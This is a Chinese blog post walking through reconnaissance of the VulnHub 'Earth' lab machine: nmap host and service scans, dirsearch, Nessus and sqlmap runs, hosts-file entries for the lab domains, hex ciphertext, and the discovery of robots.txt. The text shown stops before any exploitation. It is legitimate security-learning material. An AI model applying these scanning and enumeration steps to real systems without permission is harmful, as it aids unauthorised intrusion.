<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=2"><meta name="theme-color" content="#222"><meta http-equiv="X-UA-COMPATIBLE" content="IE=edge,chrome=1"><meta name="renderer" content="webkit"><link rel="icon" type="image/ico" sizes="32x32" href="/assets/favicon.ico"><link rel="apple-touch-icon" sizes="180x180" href="/assets/apple-touch-icon.png"><link rel="alternate" href="/rss.xml" title="Glad to see U (◦˙▽˙◦)" type="application/rss+xml"><link rel="alternate" href="/atom.xml" title="Glad to see U (◦˙▽˙◦)" type="application/atom+xml"><link rel="alternate" type="application/json" title="Glad to see U (◦˙▽˙◦)" href="https://ctf-learner.github.io/feed.json"><link rel="preconnect" href="https://lf9-cdn-tos.bytecdntp.com"><link rel="preconnect" href="https://at.alicdn.com"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CFredericka%20the%20Great:400,400italic,700,700italic%7CNoto%20Serif%20JP:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic%7CInconsolata:400,400italic,700,700italic&amp;display=swap&amp;subset=latin,latin-ext" media="none" onload="this.media='all'"><link rel="stylesheet" href="/css/app.css?v=0.4.2"><link rel="modulepreload" href="/js/chunk-LH3UUIAZ.js"><link rel="modulepreload" href="/js/chunk-QRJM7WWL.js"><link rel="modulepreload" href="/js/chunk-RAMJ2IY5.js"><link rel="modulepreload" href="/js/chunk-S3F4KD3R.js"><link rel="modulepreload" href="/js/chunk-YVJPANCJ.js"><link rel="modulepreload" href="/js/comments-YV65DDGU.js"><link rel="modulepreload" href="/js/index.esm-5SVDFJ47.js"><link rel="modulepreload" href="/js/post-RDTJBKFB.js"><link rel="modulepreload" href="/js/quicklink-JZA437DS.js"><link rel="modulepreload" href="/js/search-QNBO6RKT.js"><link rel="modulepreload" href="/js/siteInit.js"><link rel="stylesheet" href="https://npm.webcache.cn/@waline/client@3.0.0-alpha.11/dist/waline.css" media="none" onload="this.media='all'"><link rel="preload" href="https://s2.loli.net/2024/04/13/rn6eom3xu2ZHWfU.jpg" as="image" fetchpriority="high"><link rel="preload" href="https://s2.loli.net/2024/04/15/K3ONcC86izSgWQB.webp" as="image" fetchpriority="high"><link rel="preload" href="https://cdn.pixabay.com/photo/2016/10/21/14/50/plouzane-1758197_640.jpg" as="image" fetchpriority="high"><link rel="preload" href="https://s2.loli.net/2024/04/15/6RALWQTVwXmUtNu.webp" as="image" fetchpriority="high"><link rel="preload" href="https://s2.loli.net/2024/04/15/wu12NE3xPFzHXGR.webp" as="image" fetchpriority="high"><link rel="preload" href="https://s2.loli.net/2024/04/15/lyKmiwoN5bPLaUd.webp" as="image" fetchpriority="high"><meta name="keywords" content="Penetration Test"><meta name="description" content="Never hack for profit"><link rel="canonical" href="https://ctf-learner.github.io/post/Get-Earth-Shell/"><title>Get Earth Shell</title><meta name="generator" content="Hexo 7.1.1"></head><body itemscope="" itemtype="http://schema.org/WebPage"><div id="loading"><div class="cat"><div class="body"></div><div class="head"><div class="face"></div></div><div class="foot"><div class="tummy-end"></div><div class="bottom"></div><div class="legs left"></div><div class="legs right"></div></div><div class="paw"><div class="hands left"></div><div class="hands right"></div></div></div></div><div id="container"><header id="header" itemscope="" itemtype="http://schema.org/WPHeader"><div class="inner"><div id="brand"><div class="pjax"><h1 itemprop="name headline">Get Earth Shell</h1><div class="meta"><span class="item" title="创建时间：2024-05-05 20:45:35"><span class="icon"><i class="ic i-calendar"></i></span><span class="text">发表于</span><time itemprop="dateCreated datePublished" datetime="2024-05-05T20:45:35+08:00">2024-05-05</time></span><span class="item" title="本文字数"><span class="icon"><i class="ic i-pen"></i></span><span class="text">本文字数</span><span>21k</span><span class="text">字</span></span><span class="item" title="阅读时长"><span class="icon"><i class="ic i-clock"></i></span><span class="text">阅读时长</span><span>19 分钟</span></span></div></div></div><nav id="nav"><div class="inner"><div class="toggle"><div class="lines" aria-label="切换导航栏"><span class="line"></span><span class="line"></span><span class="line"></span></div></div><ul class="menu"><li class="item title"><a href="/" rel="start">MorIo24's blog</a></li></ul><ul class="right" id="rightNav"><li class="item theme"><i class="ic i-sun"></i></li><li class="item search"><i class="ic i-search"></i></li></ul></div></nav></div><div class="pjax" id="imgs"><ul><li class="item" style="background-image: url(&quot;https://s2.loli.net/2024/04/13/rn6eom3xu2ZHWfU.jpg&quot;);"></li><li class="item" style="background-image: url(&quot;https://s2.loli.net/2024/04/15/K3ONcC86izSgWQB.webp&quot;);"></li><li class="item" style="background-image: url(&quot;https://cdn.pixabay.com/photo/2016/10/21/14/50/plouzane-1758197_640.jpg&quot;);"></li><li class="item" style="background-image: url(&quot;https://s2.loli.net/2024/04/15/6RALWQTVwXmUtNu.webp&quot;);"></li><li class="item" style="background-image: url(&quot;https://s2.loli.net/2024/04/15/wu12NE3xPFzHXGR.webp&quot;);"></li><li class="item" style="background-image: url(&quot;https://s2.loli.net/2024/04/15/lyKmiwoN5bPLaUd.webp&quot;);"></li></ul></div></header><div id="waves"><svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto"><defs><path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z"></path></defs><g class="parallax"><use xlink:href="#gentle-wave" x="48" y="0"></use><use xlink:href="#gentle-wave" x="48" y="3"></use><use xlink:href="#gentle-wave" x="48" y="5"></use><use xlink:href="#gentle-wave" x="48" y="7"></use></g></svg></div><main><div class="inner"><div class="pjax" id="main"><div class="article wrap"><div class="breadcrumb" itemlistelement="" itemscope="" itemtype="https://schema.org/BreadcrumbList"><i class="ic i-home"></i><span><a href="/">首页</a></span><i class="ic i-angle-right"></i><span class="current" itemprop="itemListElement" itemscope="itemscope" itemtype="https://schema.org/ListItem"><a href="/categories/Penetration-Test/" itemprop="item" rel="index" title="分类于Penetration Test"><span itemprop="name">Penetration Test<meta itemprop="position" content="0"></span></a></span></div><article class="post block" itemscope="itemscope" itemtype="http://schema.org/Article" lang="zh-CN"><link itemprop="mainEntityOfPage" href="https://ctf-learner.github.io/post/Get-Earth-Shell/"><span hidden="hidden" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person"><meta itemprop="image" content="/assets/avatar.jpg"><meta itemprop="name" content="MorIo24"><meta itemprop="description" content="Never hack for profit, Never hack for profit"></span><span hidden="hidden" itemprop="publisher" itemscope="itemscope" itemtype="http://schema.org/Organization"><meta itemprop="name" content="Glad to see U (◦˙▽˙◦)"></span><div class="body md" itemprop="articleBody"><p><span class="label success">上次更新时间：2024-05-05</span></p>
<p>行星系列靶机 ———Earth。</p>
<p>新手的第二次实战，学到的都是满满的知识，一路上走了许多弯路，不认识框架，看不懂 Linux 的权限机制，越权时找不到方向等等等等，在未知中摸索，享受 blackbox 的乐趣，未来的路很长，肩上的担子还很重。</p>
<p><a target="_blank" rel="noopener external nofollow noreferrer" href="https://www.vulnhub.com/entry/the-planets-earth,755/">The Planets: Earth ~ VulnHub</a></p>
<p>Earth 靶机下载：<a target="_blank" rel="noopener external nofollow noreferrer" href="https://download.vulnhub.com/theplanets/Earth.ova">https://download.vulnhub.com/theplanets/Earth.ova</a></p>
<p><img loading="lazy" data-src="/images/Earth%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95.assets/image-20240502230855254.webp" alt="image-20240502230855254"></p>
<p>kali ip 地址：192.168.81.129</p>
<h1 id="主机发现"><a class="anchor" href="#主机发现">#</a> 主机发现</h1>
<p>老样子，先 nmap 简单扫一下：</p>
<figure class="highlight bash"><figcaption data-lang="bash"><span>对照mac地址寻找ip</span></figcaption><table><tbody><tr><td data-num="1"></td><td><pre>└─$ nmap <span class="token parameter variable">-sP</span> <span class="token number">192.168</span>.81.0/24</pre></td></tr><tr><td data-num="2"></td><td><pre>Starting Nmap <span class="token number">7</span>.94SVN <span class="token punctuation">(</span> https://nmap.org <span class="token punctuation">)</span> at <span class="token number">2024</span>-05-02 <span class="token number">11</span>:11 EDT</pre></td></tr><tr><td data-num="3"></td><td><pre>Nmap scan report <span class="token keyword">for</span> <span class="token number">192.168</span>.81.1</pre></td></tr><tr><td data-num="4"></td><td><pre>Host is up <span class="token punctuation">(</span><span class="token number">0</span>.0026s latency<span class="token punctuation">)</span>.</pre></td></tr><tr><td data-num="5"></td><td><pre>MAC Address: 00:50:56:C0:00:08 <span class="token punctuation">(</span>VMware<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="6"></td><td><pre>Nmap scan report <span class="token keyword">for</span> <span class="token number">192.168</span>.81.2</pre></td></tr><tr><td data-num="7"></td><td><pre>Host is up <span class="token punctuation">(</span><span class="token number">0</span>.00032s latency<span class="token punctuation">)</span>.</pre></td></tr><tr><td data-num="8"></td><td><pre>MAC Address: 00:50:56:E2:03:BD <span class="token punctuation">(</span>VMware<span class="token punctuation">)</span></pre></td></tr><tr class="marked"><td data-num="9"></td><td><pre>Nmap scan report <span class="token keyword">for</span> <span class="token number">192.168</span>.81.131     <span class="token comment">#  Earth 靶机 ip 地址</span></pre></td></tr><tr class="marked"><td data-num="10"></td><td><pre>Host is up <span class="token punctuation">(</span><span class="token number">0</span>.00085s latency<span class="token punctuation">)</span>.</pre></td></tr><tr class="marked"><td data-num="11"></td><td><pre>MAC Address: 00:50:56:2B:3B:46 <span class="token punctuation">(</span>VMware<span class="token punctuation">)</span>  <span class="token comment"># 发现 mac 地址，锁定这就是靶机</span></pre></td></tr><tr><td data-num="12"></td><td><pre>Nmap scan report <span class="token keyword">for</span> <span class="token number">192.168</span>.81.254</pre></td></tr><tr><td data-num="13"></td><td><pre>Host is up <span class="token punctuation">(</span><span class="token number">0</span>.00037s latency<span class="token punctuation">)</span>.</pre></td></tr><tr><td data-num="14"></td><td><pre>MAC Address: 00:50:56:E9:20:9C <span class="token punctuation">(</span>VMware<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="15"></td><td><pre>Nmap scan report <span class="token keyword">for</span> <span class="token number">192.168</span>.81.129</pre></td></tr><tr><td data-num="16"></td><td><pre>Host is up.</pre></td></tr><tr><td data-num="17"></td><td><pre>Nmap done: <span class="token number">256</span> IP addresses <span class="token punctuation">(</span><span class="token number">5</span> hosts up<span class="token punctuation">)</span> scanned <span class="token keyword">in</span> <span class="token number">4.34</span> seconds</pre></td></tr></tbody></table></figure><p>然后深度扫描一下端口：</p>
<figure class="highlight bash"><figcaption data-lang="bash"><span>深度扫描</span></figcaption><table><tbody><tr><td data-num="1"></td><td><pre>└─$ nmap <span class="token parameter variable">-sV</span> <span class="token parameter variable">-A</span> <span class="token number">192.168</span>.81.131    <span class="token comment">#  -sV -A  扫描系统版本和开启端口的服务</span></pre></td></tr><tr><td data-num="2"></td><td><pre>Starting Nmap <span class="token number">7</span>.94SVN <span class="token punctuation">(</span> https://nmap.org <span class="token punctuation">)</span> at <span class="token number">2024</span>-05-02 <span class="token number">11</span>:13 EDT</pre></td></tr><tr><td data-num="3"></td><td><pre>Nmap scan report <span class="token keyword">for</span> <span class="token number">192.168</span>.81.131</pre></td></tr><tr><td data-num="4"></td><td><pre>Host is up <span class="token punctuation">(</span><span class="token number">0</span>.0013s latency<span class="token punctuation">)</span>.</pre></td></tr><tr><td data-num="5"></td><td><pre>Not shown: <span class="token number">987</span> filtered tcp ports <span class="token punctuation">(</span>no-response<span class="token punctuation">)</span>, <span class="token number">10</span> filtered tcp ports <span class="token punctuation">(</span>admin-prohibited<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="6"></td><td><pre>PORT    STATE SERVICE  VERSION</pre></td></tr><tr class="marked"><td data-num="7"></td><td><pre><span class="token number">22</span>/tcp  <span class="token function">open</span>  <span class="token function">ssh</span>      OpenSSH <span class="token number">8.6</span> <span class="token punctuation">(</span>protocol <span class="token number">2.0</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="8"></td><td><pre><span class="token operator">|</span> ssh-hostkey: </pre></td></tr><tr><td data-num="9"></td><td><pre><span class="token operator">|</span>   <span class="token number">256</span> 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 <span class="token punctuation">(</span>ECDSA<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="10"></td><td><pre><span class="token operator">|</span>_  <span class="token number">256</span> b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 <span class="token punctuation">(</span>ED25519<span class="token punctuation">)</span></pre></td></tr><tr class="marked"><td data-num="11"></td><td><pre><span class="token number">80</span>/tcp  <span class="token function">open</span>  http     Apache httpd <span class="token number">2.4</span>.51 <span class="token punctuation">((</span>Fedora<span class="token punctuation">)</span> OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="12"></td><td><pre><span class="token operator">|</span>_http-title: Bad Request <span class="token punctuation">(</span><span class="token number">400</span><span class="token punctuation">)</span>   <span class="token comment">#  apache 服务器 python 版本 3.9</span></pre></td></tr><tr><td data-num="13"></td><td><pre><span class="token operator">|</span>_http-server-header: Apache/2.4.51 <span class="token punctuation">(</span>Fedora<span class="token punctuation">)</span> OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9</pre></td></tr><tr class="marked"><td data-num="14"></td><td><pre><span class="token number">443</span>/tcp <span class="token function">open</span>  ssl/http Apache httpd <span class="token number">2.4</span>.51 <span class="token punctuation">((</span>Fedora<span class="token punctuation">)</span> OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="15"></td><td><pre><span class="token operator">|</span>_ssl-date: TLS randomness does not represent <span class="token function">time</span></pre></td></tr><tr><td data-num="16"></td><td><pre><span class="token operator">|</span>_http-server-header: Apache/2.4.51 <span class="token punctuation">(</span>Fedora<span class="token punctuation">)</span> OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9</pre></td></tr><tr><td data-num="17"></td><td><pre><span class="token operator">|</span> tls-alpn: </pre></td></tr><tr><td data-num="18"></td><td><pre><span class="token operator">|</span>_  http/1.1</pre></td></tr><tr><td data-num="19"></td><td><pre><span class="token operator">|</span>_http-title: Bad Request <span class="token punctuation">(</span><span class="token number">400</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="20"></td><td><pre><span class="token operator">|</span> ssl-cert: Subject: <span class="token assign-left variable">commonName</span><span class="token operator">=</span>earth.local/stateOrProvinceName<span class="token operator">=</span>Space</pre></td></tr><tr class="marked"><td data-num="21"></td><td><pre><span class="token operator">|</span> Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local   //  没仔细看就漏了这里</pre></td></tr><tr><td data-num="22"></td><td><pre><span class="token operator">|</span> Not valid before: <span class="token number">2021</span>-10-12T23:26:31</pre></td></tr><tr><td data-num="23"></td><td><pre><span class="token operator">|</span>_Not valid after:  <span class="token number">2031</span>-10-10T23:26:31</pre></td></tr><tr><td data-num="24"></td><td><pre>MAC Address: 00:50:56:2B:3B:46 <span class="token punctuation">(</span>VMware<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="25"></td><td><pre>Warning: OSScan results may be unreliable because we could not <span class="token function">find</span> at least <span class="token number">1</span> <span class="token function">open</span> and <span class="token number">1</span> closed port</pre></td></tr><tr><td data-num="26"></td><td><pre>Device type: general purpose<span class="token operator">|</span>storage-misc   <span class="token comment">#  设备类型</span></pre></td></tr><tr class="marked"><td data-num="27"></td><td><pre>Running <span class="token punctuation">(</span>JUST GUESSING<span class="token punctuation">)</span>: Linux <span class="token number">4</span>.X<span class="token operator">|</span><span class="token number">5</span>.X<span class="token operator">|</span><span class="token number">2.6</span>.X<span class="token operator">|</span><span class="token number">3</span>.X <span class="token punctuation">(</span><span class="token number">97</span>%<span class="token punctuation">)</span>, Synology DiskStation Manager <span class="token number">5</span>.X <span class="token punctuation">(</span><span class="token number">90</span>%<span class="token punctuation">)</span>, Netgear RAIDiator <span class="token number">4</span>.X <span class="token punctuation">(</span><span class="token number">87</span>%<span class="token punctuation">)</span>    <span class="token comment">#  系统运行内核版本</span></pre></td></tr><tr><td data-num="28"></td><td><pre>OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/a:synology:diskstation_manager:5.2 cpe:/o:netgear:raidiator:4.2.28</pre></td></tr><tr><td data-num="29"></td><td><pre>Aggressive OS guesses: Linux <span class="token number">4.15</span> - <span class="token number">5.8</span> <span class="token punctuation">(</span><span class="token number">97</span>%<span class="token punctuation">)</span>, Linux <span class="token number">5.0</span> - <span class="token number">5.4</span> <span class="token punctuation">(</span><span class="token number">97</span>%<span class="token punctuation">)</span>, Linux <span class="token number">5.0</span> - <span class="token number">5.5</span> <span class="token punctuation">(</span><span class="token number">95</span>%<span class="token punctuation">)</span>, Linux <span class="token number">2.6</span>.32 <span class="token punctuation">(</span><span class="token number">91</span>%<span class="token punctuation">)</span>, Linux <span class="token number">3.10</span> - <span class="token number">4.11</span> <span class="token punctuation">(</span><span class="token number">91</span>%<span class="token punctuation">)</span>, Linux <span class="token number">3.2</span> - <span class="token number">4.9</span> <span class="token punctuation">(</span><span class="token number">91</span>%<span class="token punctuation">)</span>, Linux <span class="token number">3.4</span> - <span class="token number">3.10</span> <span class="token punctuation">(</span><span class="token number">91</span>%<span class="token punctuation">)</span>, Linux <span class="token number">5.1</span> <span class="token punctuation">(</span><span class="token number">91</span>%<span class="token punctuation">)</span>, Linux <span class="token number">2.6</span>.32 - <span class="token number">3.10</span> <span class="token punctuation">(</span><span class="token number">91</span>%<span class="token punctuation">)</span>, Linux <span class="token number">2.6</span>.32 - <span class="token number">3.13</span> <span class="token punctuation">(</span><span class="token number">91</span>%<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="30"></td><td><pre>No exact OS matches <span class="token keyword">for</span> <span class="token function">host</span> <span class="token punctuation">(</span>test conditions non-ideal<span class="token punctuation">)</span>.</pre></td></tr><tr><td data-num="31"></td><td><pre>Network Distance: <span class="token number">1</span> hop</pre></td></tr><tr><td data-num="32"></td><td><pre></pre></td></tr><tr><td data-num="33"></td><td><pre>TRACEROUTE</pre></td></tr><tr><td data-num="34"></td><td><pre>HOP RTT     ADDRESS</pre></td></tr><tr><td data-num="35"></td><td><pre><span class="token number">1</span>   <span class="token number">1.29</span> ms <span class="token number">192.168</span>.81.131</pre></td></tr></tbody></table></figure><p>很不幸，80 端口和 443 端口都报 400，并且靶机系统内核的版本号也不确定。</p>
<p><img loading="lazy" data-src="/images/Earth%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95.assets/image-20240502232516042.webp" alt="image-20240502232516042"></p>
<p>出师不利。关注到有一个不寻常的位置👇：</p>
<p><img loading="lazy" data-src="/images/Earth%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95.assets/image-20240503124531809.webp" alt="image-20240503124531809"></p>
<h1 id="绕了一堆弯子"><a class="anchor" href="#绕了一堆弯子">#</a> 绕了一堆弯子</h1>
<p>这个 mod_wsgi 是个什么东西？看看这里👉<a target="_blank" rel="noopener external nofollow noreferrer" href="https://www.liaoxuefeng.com/wiki/1016959663602400/1017805733037760">WSGI 接口 - 廖雪峰的官方网站 (liaoxuefeng.com)</a></p>
<p>通俗理解：实际上 WSGI 是底层处理 TCP 连接、HTTP 原始请求和响应格式统一的接口。Flask 底层使用的就是 WSGI 协议。</p>
<p>然后去看看有没有什么 CVE，搜出来两个结果：</p>
<p>①目录穿越漏洞，用 %2f 绕过 /，可以任意文件读取。👇</p>
<p><img loading="lazy" data-src="/images/Earth%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95.assets/image-20240503125209575.webp" alt="image-20240503125209575"></p>
<p>试了一串没有什么作用。</p>
<p>②CVE-2014-0240</p>
<blockquote>
<p>当启用守护程序模式时，Apache 的 3.5 之前的 mod_wsgi 模块在某些 Linux 内核上运行时无法正确处理 setuid 返回的错误代码，这允许本地用户通过与正在运行的进程数量相关的向量获得权限。</p>
</blockquote>
<p><img loading="lazy" data-src="/images/Earth%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95.assets/image-20240503130323202.webp" alt="image-20240503130323202"></p>
<p>搜了好多，没有复现文字，并且还没到越权那一步。msf search 也没有搜索到</p>
<p>同时 dirsearch 也跑了一下，依然一无所获。</p>
<p><img loading="lazy" data-src="/images/Earth%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95.assets/image-20240503130743214.webp" alt="image-20240503130743214"></p>
<p>没招了，用 Nessus 试一下。</p>
<p><img loading="lazy" data-src="/images/Earth%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95.assets/image-20240503185129589.webp" alt="image-20240503185129589"></p>
<p>打开看到有几个重大漏洞，还是没有找到利用的入口。</p>
<h1 id="dns域名解析问题"><a class="anchor" href="#dns域名解析问题">#</a> DNS 域名解析问题</h1>
<p>只能搜一下 wp，才发现自己遗漏了这个点👇<span class="spoiler" title="你知道得太多了">没什么经验，大佬勿喷</span></p>
<figure class="highlight bash"><figcaption data-lang="bash"><span>第八行DNS解析</span></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token number">443</span>/tcp <span class="token function">open</span>  ssl/http Apache httpd <span class="token number">2.4</span>.51 <span class="token punctuation">((</span>Fedora<span class="token punctuation">)</span> OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token operator">|</span>_ssl-date: TLS randomness does not represent <span class="token function">time</span></pre></td></tr><tr><td data-num="3"></td><td><pre><span class="token operator">|</span>_http-server-header: Apache/2.4.51 <span class="token punctuation">(</span>Fedora<span class="token punctuation">)</span> OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9</pre></td></tr><tr><td data-num="4"></td><td><pre><span class="token operator">|</span> tls-alpn: </pre></td></tr><tr><td data-num="5"></td><td><pre><span class="token operator">|</span>_  http/1.1</pre></td></tr><tr><td data-num="6"></td><td><pre><span class="token operator">|</span>_http-title: Bad Request <span class="token punctuation">(</span><span class="token number">400</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="7"></td><td><pre><span class="token operator">|</span> ssl-cert: Subject: <span class="token assign-left variable">commonName</span><span class="token operator">=</span>earth.local/stateOrProvinceName<span class="token operator">=</span>Space</pre></td></tr><tr class="marked"><td data-num="8"></td><td><pre><span class="token operator">|</span> Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local   <span class="token operator">!</span><span class="token operator">!</span><span class="token operator">!</span><span class="token operator">!</span><span class="token operator">!</span><span class="token operator">!</span><span class="token operator">!</span><span class="token operator">!</span></pre></td></tr></tbody></table></figure><p>才发现用 ip 地址是无法正常访问，需要添加 DNS 解析。</p>
<p>所以修改 hosts 文件（本机的或者 kali 的），路径： <code>C:\Windows\System32\drivers\etc</code> （ <code>/etc/hosts</code> ）</p>
<figure class="highlight text"><figcaption data-lang="text"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre>192.168.81.131 earth.local</pre></td></tr><tr><td data-num="2"></td><td><pre>192.168.81.131  terratest.earth.local</pre></td></tr></tbody></table></figure><p><img loading="lazy" data-src="/images/Earth%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95.assets/image-20240503131304539.webp" alt="image-20240503131304539"></p>
<p>修改完一般会立即生效，若没生效可以在 powershell 或者 cmd 中刷新 DNS 解析配置：   <code>ipconfig /flushdns</code></p>
<h1 id="反向代理证书验证"><a class="anchor" href="#反向代理证书验证">#</a> 反向代理？！证书验证？！</h1>
<p>出于好奇我也搜了一下原因：</p>
<p>🤖GPT: 可能的原因有👇</p>
<ol>
<li class="lvl-3">
<p><strong>证书验证</strong>：如前所述，如果服务器配置了 SSL/TLS 证书，并且证书中包含了域名作为主题备用名称（SAN），那么使用域名访问时，浏览器或客户端能够验证服务器的身份。而直接使用 IP 地址访问时，由于缺乏域名信息，SSL/TLS 证书的验证可能会失败，导致 400 错误。</p>
</li>
<li class="lvl-3">
<p><strong>防火墙或安全规则</strong>：服务器的防火墙或安全规则可能配置为仅接受来自特定域名的请求，而拒绝来自 IP 地址的请求。</p>
</li>
<li class="lvl-3">
<p><strong>服务器负载均衡器或反向代理</strong>：如果服务器后端使用了负载均衡器或反向代理，它们可能根据请求的域名来决定如何路由请求，而直接使用 IP 地址可能不会经过相同的路由逻辑。</p>
</li>
</ol>
<details class="info"><summary>反向代理是什么鬼？</summary><div>
<p>先说正向代理：</p>
<p>正常代理服务器（中间人）一般在客户端到服务器之间。</p>
<blockquote>
<p>浏览器（客户端） ----(request)----&gt;    中间人（代理服务器）------&gt;  目标服务器    ----------&gt;   中间人（代理服务器）-----(response)----&gt; 浏览器（客户端）</p>
</blockquote>
<p>黄牛抢票，中介卖房，上课传纸条…… 都是正向代理。<strong>正向代理，其实是 "代理服务器" 代理了 "客户端"，去和 "目标服务器" 进行交互。</strong></p>
<p>正向代理可以：突破访问限制、提高访问速度、隐藏客户端真实 IP。</p>
<p><strong>那么反向代理就是：</strong></p>
<blockquote>
<p>浏览器（客户端） ----(request)----&gt; 中转服务器 ---(Request parsing)---&gt;  目标服务器    ---(response)----&gt; 浏览器（客户端）</p>
</blockquote>
<p>而反向代理是在请求到达服务器之后，<strong>"代理服务器" 代表了 "目标服务器"，去和 "客户端" 进行交互。</strong></p>
<p>因此在这里请求 ip 地址 <code>192.168.81.131</code>  有可能不是服务器真实的地址，而是一个 nginx 代理服务器或者是一个 DNS 解析服务器，而我们的域名到达后再解析到对应的服务上；也有可能是虚拟主机……</p>
</div></details>
<p><a target="_blank" rel="noopener external nofollow noreferrer" href="https://blog.csdn.net/gui951753/article/details/83070180">为什么域名能够访问网站，而直接使用 IP 不可以_不做域名解析直接用公网 ip 访问可否 - CSDN 博客</a></p>
<p>但是 —— 这里似乎是 SSL 证书问题（用 python 请求域名地址就会提示证书问题……）</p>
<h1 id="xor初探"><a class="anchor" href="#xor初探">#</a> XOR 初探</h1>
<p>折腾完，访问一下终于正常了：</p>
<p><img loading="lazy" data-src="/images/Earth%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95.assets/image-20240503134311209.webp" alt="image-20240503134311209"></p>
<p>下面有很长串的字符贴在这里，划都划不到尽头。一眼扫过字母都是在 a-f，有可能是 16 进制，但是转码出来是乱码。</p>
<figure class="highlight text"><figcaption data-lang="text"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre>2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a</pre></td></tr></tbody></table></figure><figure class="highlight text"><figcaption data-lang="text"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre>3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45</pre></td></tr></tbody></table></figure><figure class="highlight text"><figcaption data-lang="text"><span>重点关注！</span></figcaption><table><tbody><tr><td data-num="1"></td><td><pre>37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40</pre></td></tr></tbody></table></figure><p>用 dirsearch 扫目录发现 admin 路由 301，估计被重定向到验证登录界面了。</p>
<p>让 sqlmap 在后台跑着先，换另一个域名找找线索。 <code>http://terratest.earth.local/</code></p>
<p>打开的界面是一样的。还是扫一扫目录看看。结果和前面是一样的，难道两个域名下服务都是一样的？</p>
<p>然后我又用 nmap 扫了两个域名，两个域名都开放了 22，80，443 端口。于是我改成用 https 协议访问了一下。</p>
<p><img loading="lazy" data-src="/images/Earth%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95.assets/image-20240503184626790.webp" alt="image-20240503184626790"></p>
<p>测试站点让我忽略？我信你个鬼你个糟老头子坏得很。测试站点感觉有源码泄露的可能。先上 dirsearch。</p>
<p><img loading="lazy" data-src="/images/Earth%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95.assets/image-20240503185241920.webp" alt="image-20240503185241920"></p>
<p>果然有玄机。虽然都是 403，但是 200 的 robots.txt 可以访问到。</p>
